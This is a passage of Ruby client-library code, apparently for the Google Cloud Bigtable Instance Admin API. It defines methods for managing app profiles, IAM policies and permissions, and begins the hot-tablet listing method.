metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :delete_cluster, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Creates an app profile within an instance.
#
# @overload create_app_profile(request, options = nil)
# Pass arguments to `create_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload create_app_profile(parent: nil, app_profile_id: nil, app_profile: nil, ignore_warnings: nil)
# Pass arguments to `create_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance in which to create the new app profile.
# Values are of the form
# `projects/{project}/instances/{instance}`.
# @param app_profile_id [::String]
# Required. The ID to be used when referring to the new app profile within its
# instance, e.g., just `myprofile` rather than
# `projects/myproject/instances/myinstance/appProfiles/myprofile`.
# @param app_profile [::Google::Cloud::Bigtable::Admin::V2::AppProfile, ::Hash]
# Required. The app profile to be created.
# Fields marked `OutputOnly` will be ignored.
# @param ignore_warnings [::Boolean]
# If true, ignore safety checks when creating the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest.new
#
# # Call the create_app_profile method.
# result = client.create_app_profile request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p result
#
def create_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::CreateAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.create_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.create_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.create_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :create_app_profile, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Gets information about an app profile.
#
# @overload get_app_profile(request, options = nil)
# Pass arguments to `get_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_app_profile(name: nil)
# Pass arguments to `get_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the requested app profile. Values are of the form
# `projects/{project}/instances/{instance}/appProfiles/{app_profile}`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Cloud::Bigtable::Admin::V2::AppProfile]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest.new
#
# # Call the get_app_profile method.
# result = client.get_app_profile request
#
# # The returned object is of type Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p result
#
def get_app_profile request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::GetAppProfileRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_app_profile.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.name
header_params["name"] = request.name
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_app_profile.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_app_profile.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :get_app_profile, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists information about app profiles in an instance.
#
# @overload list_app_profiles(request, options = nil)
# Pass arguments to `list_app_profiles` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_app_profiles(parent: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_app_profiles` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The unique name of the instance for which a list of app profiles is
# requested. Values are of the form
# `projects/{project}/instances/{instance}`.
# Use `{instance} = '-'` to list AppProfiles for all Instances in a project,
# e.g., `projects/myproject/instances/-`.
# @param page_size [::Integer]
# Maximum number of results per page.
#
# A page_size of zero lets the server choose the number of items to return.
# A page_size which is strictly positive will return at most that many items.
# A negative page_size will cause an error.
#
# Following the first request, subsequent paginated calls are not required
# to pass a page_size. If a page_size is set in subsequent calls, it must
# match the page_size given in the first request.
# @param page_token [::String]
# The value of `next_page_token` returned by a previous call.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::AppProfile>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::AppProfile>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest.new
#
# # Call the list_app_profiles method.
# result = client.list_app_profiles request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Cloud::Bigtable::Admin::V2::AppProfile.
# p response
# end
#
def list_app_profiles request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListAppProfilesRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_app_profiles.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_app_profiles.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_app_profiles.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_app_profiles, request, options: options do |response, operation|
response = ::Gapic::PagedEnumerable.new @bigtable_instance_admin_stub, :list_app_profiles, request, response, operation, options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Updates an app profile within an instance.
#
# @overload update_app_profile(request, options = nil)
# Pass arguments to `update_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload update_app_profile(app_profile: nil, update_mask: nil, ignore_warnings: nil)
# Pass arguments to `update_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param app_profile [::Google::Cloud::Bigtable::Admin::V2::AppProfile, ::Hash]
# Required. The app profile which will (partially) replace the current value.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# Required. The subset of app profile fields which should be replaced.
# If unset, all fields will be replaced.
# @param ignore_warnings [::Boolean]
# If true, ignore safety checks when updating the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::Operation]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::Operation]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest.new
#
# # Call the update_app_profile method.
# result = client.update_app_profile request
#
# # The returned object is of type Gapic::Operation. You can use this
# # object to check the status of an operation, cancel it, or wait
# # for results. Here is how to block until completion:
# result.wait_until_done! timeout: 60
# if result.response?
# p result.response
# else
# puts "Error!"
# end
#
# Updates an app profile within an instance. Returns a long-running
# operation wrapped in a {::Gapic::Operation} so callers can poll,
# cancel, or block on the result.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def update_app_profile request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::UpdateAppProfileRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.update_app_profile.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["app_profile.name"] = request.app_profile.name if request.app_profile&.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.update_app_profile.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.update_app_profile.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :update_app_profile, request, options: options do |response, operation|
    # Wrap the raw long-running operation for polling/cancellation support.
    response = ::Gapic::Operation.new response, @operations_client, options: options
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Deletes an app profile from an instance.
#
# @overload delete_app_profile(request, options = nil)
# Pass arguments to `delete_app_profile` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload delete_app_profile(name: nil, ignore_warnings: nil)
# Pass arguments to `delete_app_profile` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param name [::String]
# Required. The unique name of the app profile to be deleted. Values are of the form
# `projects/{project}/instances/{instance}/appProfiles/{app_profile}`.
# @param ignore_warnings [::Boolean]
# Required. If true, ignore safety checks when deleting the app profile.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Protobuf::Empty]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Protobuf::Empty]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest.new
#
# # Call the delete_app_profile method.
# result = client.delete_app_profile request
#
# # The returned object is of type Google::Protobuf::Empty.
# p result
#
# Deletes an app profile from an instance. Returns Google::Protobuf::Empty
# on success.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def delete_app_profile request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request,
                                     to: ::Google::Cloud::Bigtable::Admin::V2::DeleteAppProfileRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.delete_app_profile.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["name"] = request.name if request.name
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.delete_app_profile.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.delete_app_profile.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :delete_app_profile, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Gets the access control policy for an instance resource. Returns an empty
# policy if an instance exists but does not have a policy set.
#
# @overload get_iam_policy(request, options = nil)
# Pass arguments to `get_iam_policy` via a request object, either of type
# {::Google::Iam::V1::GetIamPolicyRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::GetIamPolicyRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_iam_policy(resource: nil, options: nil)
# Pass arguments to `get_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy is being requested.
# See the operation documentation for the appropriate value for this field.
# @param options [::Google::Iam::V1::GetPolicyOptions, ::Hash]
# OPTIONAL: A `GetPolicyOptions` object for specifying options to
# `GetIamPolicy`.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::Policy]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::GetIamPolicyRequest.new
#
# # Call the get_iam_policy method.
# result = client.get_iam_policy request
#
# # The returned object is of type Google::Iam::V1::Policy.
# p result
#
# Gets the access control policy for an instance resource. Returns an
# empty policy if the instance exists but has no policy set.
#
# @param request [::Google::Iam::V1::GetIamPolicyRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def get_iam_policy request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::GetIamPolicyRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.get_iam_policy.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["resource"] = request.resource if request.resource
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.get_iam_policy.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.get_iam_policy.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :get_iam_policy, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Sets the access control policy on an instance resource. Replaces any
# existing policy.
#
# @overload set_iam_policy(request, options = nil)
# Pass arguments to `set_iam_policy` via a request object, either of type
# {::Google::Iam::V1::SetIamPolicyRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::SetIamPolicyRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload set_iam_policy(resource: nil, policy: nil, update_mask: nil)
# Pass arguments to `set_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy is being specified.
# See the operation documentation for the appropriate value for this field.
# @param policy [::Google::Iam::V1::Policy, ::Hash]
# REQUIRED: The complete policy to be applied to the `resource`. The size of
# the policy is limited to a few 10s of KB. An empty policy is a
# valid policy but certain Cloud Platform services (such as Projects)
# might reject them.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# OPTIONAL: A FieldMask specifying which fields of the policy to modify. Only
# the fields in the mask will be modified. If no mask is provided, the
# following default mask is used:
#
# `paths: "bindings, etag"`
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::Policy]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::SetIamPolicyRequest.new
#
# # Call the set_iam_policy method.
# result = client.set_iam_policy request
#
# # The returned object is of type Google::Iam::V1::Policy.
# p result
#
# Sets the access control policy on an instance resource, replacing any
# existing policy.
#
# @param request [::Google::Iam::V1::SetIamPolicyRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def set_iam_policy request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::SetIamPolicyRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.set_iam_policy.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["resource"] = request.resource if request.resource
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.set_iam_policy.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.set_iam_policy.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :set_iam_policy, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Returns permissions that the caller has on the specified instance resource.
#
# @overload test_iam_permissions(request, options = nil)
# Pass arguments to `test_iam_permissions` via a request object, either of type
# {::Google::Iam::V1::TestIamPermissionsRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::TestIamPermissionsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload test_iam_permissions(resource: nil, permissions: nil)
# Pass arguments to `test_iam_permissions` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy detail is being requested.
# See the operation documentation for the appropriate value for this field.
# @param permissions [::Array<::String>]
# The set of permissions to check for the `resource`. Permissions with
# wildcards (such as '*' or 'storage.*') are not allowed. For more
# information see
# [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions).
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::TestIamPermissionsResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::TestIamPermissionsResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::TestIamPermissionsRequest.new
#
# # Call the test_iam_permissions method.
# result = client.test_iam_permissions request
#
# # The returned object is of type Google::Iam::V1::TestIamPermissionsResponse.
# p result
#
# Returns the subset of the requested permissions that the caller has on
# the specified instance resource.
#
# @param request [::Google::Iam::V1::TestIamPermissionsRequest, ::Hash]
# @param options [::Gapic::CallOptions, ::Hash, nil]
def test_iam_permissions request, options = nil
  raise ::ArgumentError, "request must be provided" if request.nil?

  # Coerce a plain Hash into the proper protobuf request message.
  request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::TestIamPermissionsRequest

  # Normalize options (a Hash or nil) into a CallOptions object.
  options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h

  # Assemble per-call gRPC metadata, seeded from the RPC-specific config.
  call_metadata = @config.rpcs.test_iam_permissions.metadata.to_h
  call_metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client(
    lib_name:      @config.lib_name,
    lib_version:   @config.lib_version,
    gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
  )
  call_metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id

  # Build the implicit routing header from the request's resource name.
  routing_params = {}
  routing_params["resource"] = request.resource if request.resource
  call_metadata[:"x-goog-request-params"] ||= routing_params.map { |field, value| "#{field}=#{value}" }.join("&")

  # Layer defaults: RPC-specific settings first, then client-wide settings.
  options.apply_defaults timeout:      @config.rpcs.test_iam_permissions.timeout,
                         metadata:     call_metadata,
                         retry_policy: @config.rpcs.test_iam_permissions.retry_policy
  options.apply_defaults timeout:      @config.timeout,
                         metadata:     @config.metadata,
                         retry_policy: @config.retry_policy

  @bigtable_instance_admin_stub.call_rpc :test_iam_permissions, request, options: options do |response, operation|
    yield response, operation if block_given?
    return response
  end
rescue ::GRPC::BadStatus => grpc_error
  raise ::Google::Cloud::Error.from_error(grpc_error)
end
##
# Lists hot tablets in a cluster, within the time range provided. Hot
# tablets are ordered based on CPU usage.
#
# @overload list_hot_tablets(request, options = nil)
# Pass arguments to `list_hot_tablets` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_hot_tablets(parent: nil, start_time: nil, end_time: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_hot_tablets` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The cluster name to list hot tablets.
# Value is in the following form:
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
# @param start_time [::Google::Protobuf::Timestamp, ::Hash]
# The start time to list hot tablets. The hot tablets in the response will
# have start times between the requested start time and end time. Start time
# defaults to Now if it is unset, and end time defaults to Now - 24 hours if
# it is unset. The start time should be less than the end time, and the
# maximum allowed time range between start time and end time is 48 hours.
# Start time and end time should have values between Now and Now - 14 days.
# @param end_time [::Google::Protobuf::Timestamp, ::Hash]
# The end time to list hot tablets.
# @param page_size [::Integer]
# Maximum number of results per page.
#
# A page_size that is empty or zero lets the server choose the number of
# items to return. A page_size which is strictly positive will return at most
# that many items. A negative page_size will cause an error.
#
# Following the first request, subsequent paginated calls do not need a
